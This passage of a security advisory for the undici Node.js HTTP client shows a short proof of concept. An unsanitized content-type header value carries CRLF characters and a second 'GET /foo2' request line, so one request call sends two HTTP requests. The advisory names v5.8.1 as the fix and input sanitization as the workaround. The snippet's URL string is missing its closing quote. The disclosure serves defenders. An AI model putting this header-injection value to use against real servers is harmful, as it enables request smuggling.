    import { request } from 'undici'
    
    const unsanitizedContentTypeInput =  'application/json\r\n\r\nGET /foo2 HTTP/1.1'
    
    await request('http://localhost:3000, {
        method: 'GET',
        headers: {
          'content-type': unsanitizedContentTypeInput
        },
    })
    

The above snippet will perform two requests in a single request API call:

1.  http://localhost:3000/
2.  http://localhost:3000/foo2

**Patches**

This issue was patched in Undici v5.8.1

**Workarounds**

Sanitize input when sending content-type headers using user input.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in undici repository
*   To make a report, follow the SECURITY document

Tag

#js